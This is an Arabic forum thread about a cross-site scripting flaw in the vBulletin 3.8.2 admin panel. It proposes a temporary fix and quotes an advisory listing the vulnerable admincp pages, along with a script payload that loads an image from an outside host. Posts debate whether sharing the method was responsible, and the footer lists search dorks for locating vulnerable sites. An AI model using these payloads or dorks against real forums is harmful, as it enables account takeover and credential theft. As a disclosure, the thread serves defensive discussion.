Follow us on...
Follow us on Twitter Follow us on Facebook Watch us on YouTube

صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 8 من 9
  1. #1
    عضو منتسب
    تاريخ التسجيل
    May 2009
    الدولة
    ليبــZwarah ـيا
    العمر
    20
    المشاركات
    26

    افتراضي [ترقيع] ثغرة vBulletin 3.8.2 adminCP Cross-Site


    السلام عليكم ...
    اليوم أتيت إليكم بترقيع لثغرة النسخة 3.8.2 ...


    وهي تكمن في مجلد admincp ..


    والترقيع وهي تغير مسار مجلد الـadmincp كا أسم وتغيره من ملف الكونفيكت أيضاً .. إضافتاً إلى وضع الجدار الناري عليه للأهمية ...



    ولكم مني خالص الإحترام والتقدر


    Protection



  2. #2
    :: إداري ::

    تاريخ التسجيل
    Aug 2007
    الدولة
    SyRiA
    المشاركات
    2,176

    افتراضي


    بارك الله فيك لكن يرجى شرح اكثر للثغرة و مصدر الخبر

    تحياتي لك


    Miss you
    Miss you
    Miss you

    (Is it possible that you return to me))


  3. #3
    مسؤل سابق
    تاريخ التسجيل
    Aug 2008
    الدولة
    النادي الحبيب
    المشاركات
    861

    افتراضي


    بسم الله

    الثغره

    رمز Code:الثغرة

    vBulletin 3.8.2 adminCP Cross-Site Scripting
    R
    .I.P DrtRp We miss you
    ---------------------------------------------
    Original Post at http://forum.aria-security.com/en/showthread.php?p=1179
    Greetz to Aura all Aria-Security Mods Members

    These were all tested on vbulletin 3.8.0 RC2 so other version may be effected
    .

    1. Users Titleadmincp/usertitle.php?do=modifyAdd a new title. use the following code as title name.

    <
    script>document.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
    or any other XSS code.

    2.Post Icons. admincp/image.php?do=add&table=icon add new title.. give a wrong path such as /images/aria.gif.  use the following code as title name.

    <script>document.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>

    3.Post new Smilies. image.php?do=add&table=smilie ... SAME AS #2.  use the following code as title name.

    <script>document.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>

    4.New avatar. admincp/image.php?do=add&table=avatar Same as #2. dont forget the update. use the following code as title name.
    <script>document.write('<img ***="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script> 
    الثغره هي .. صورتين وملف هتكس .. ويقوم المهاجم بوضع رابط في اي موضوع ..

    وعند دخول اي شخص يطلع له لوحة مثل الفلتر وعند وضع الباس واليوزر ينرسل إلى ملف التكست او الكوكيز ..

    يعني الثغره زي Add a new title+Post Icons+post new Smilies



    .. حل الثغره ..

    تغيير مجلد الـ admincp .. ووضع جدار ناري .. ==> حل مؤقت لين ما يفرجها ربي

    و الحمدلله اتوقع الكثير مقفلين ادمن سي بي و مغيرينه يعني ما راح تكون خطيرة

    و ان شاء الله ينزل ترقيع رسمي


    معا لنرجع النادي كما كان انت شارك وانت رد وانت ادع اعضاء جدد
    لا تقم بالتسجيل ان لم تكن تنوي الانضمام لاسرتنا

  4. #4
    عضو منتسب
    تاريخ التسجيل
    May 2009
    الدولة
    ليبــZwarah ـيا
    العمر
    20
    المشاركات
    26

    افتراضي


    السلام عليكم ..

    حضراتكم قد اتيتم بطريقة إستثمار الثغرة !! ؟؟

    وهذا شئ غير مقبول أعتقده حتى لا تقع بيد من لا يخاف الله ويقوم بإستغلال الثغرة واللهو بوضع إندكساته في المنتديات العربية والمسلمة !!


    أعذروني لكني لست موافق عما حدث



  5. #5
    عضو مشارك
    تاريخ التسجيل
    Jan 2008
    الدولة
    E_G_Y_P_T
    المشاركات
    91

    افتراضي


    شكرا على الترقيع وإلى الأمام دائما اخوانى



  6. #6
    عضويه خاصه
    تاريخ التسجيل
    May 2008
    المشاركات
    888

    افتراضي


    اقتباس المشاركة الأصلية كتبت بواسطة protection مشاهدة المشاركة
    السلام عليكم ..

    حضراتكم قد اتيتم بطريقة إستثمار الثغرة !! ؟؟

    وهذا شئ غير مقبول أعتقده حتى لا تقع بيد من لا يخاف الله ويقوم بإستغلال الثغرة واللهو بوضع إندكساته في المنتديات العربية والمسلمة !!


    أعذروني لكني لست موافق عما حدث
    لكن يا غالى هذه فقط فكرة الثغرة ولا يوجد فيها طريقة
    استغلال الثغرة مجرد توضيح للفكرة فقط
    و بالتوفيق لك ان شاء الله


    ||||||||||||||||||||
    EGY

    ||||||||||||||||||||

  7. #7
    عضو نشيط
    تاريخ التسجيل
    Sep 2008
    المشاركات
    182

    افتراضي


    مشكور اخوي ...~


    إذا ضاقت بكالدنيا فلا تقل: يا رب عندي هم كبير ..... وبل قل : يا هم لي رب كبيــــــــــر..

  8. #8
    عضو منتسب
    تاريخ التسجيل
    Jun 2009
    العمر
    25
    المشاركات
    1

    افتراضي


    اخوي انت جبت العيد يوم اعطيت شرح لاستغلالها

    وبعد الهكر المبتدئ يفرح فالعلوم هذي ويروح يجربها على المواقع والمنتديات العربيه والاسلامية



 

 
صفحة 1 من 2 12 الأخيرةالأخيرة

   زوار هذه الصفحة من محركات البحث وصلوا عن طريق :

ثغرات 3.8.2

intext:vbulletin inurl:admincp

ثغرة admincp

ثغرة vBulletin 3.8.2

ثغره Powered by vBulletin Version 3.8.2

powered by vBulletin Version 3.8.2 ثغره

vBulletin 3.8.2 ثغرات

مواقع النشر (المفضلة)

مواقع النشر (المفضلة)

ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •